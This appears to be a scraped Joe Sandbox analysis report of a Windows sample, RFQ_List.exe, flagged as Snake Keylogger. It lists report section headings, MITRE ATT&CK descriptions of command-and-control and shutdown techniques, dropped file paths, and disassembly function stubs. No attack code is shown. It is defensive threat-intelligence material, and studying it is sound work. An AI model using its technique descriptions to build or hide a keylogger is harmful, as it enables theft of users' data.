Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RFQ_List.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\msiexec.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Damascenere.lnk

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfn5nrr5.t0s.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktypj4l3.rbd.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1ciw54n.ydz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ourykt1r.st3.psm1

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exe

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exe:Zone.Identifier

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\cellulomonas.irr

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\eskimologens.for

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\lila.bes

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\onomatopoeical.kri

Windows Analysis Report
RFQ_List.exe

Function 004032A0 Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 401
stringfilecomCOMMON

Function 00404B30 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Function 00406077 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207
stringCOMMON

Function 00405846 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre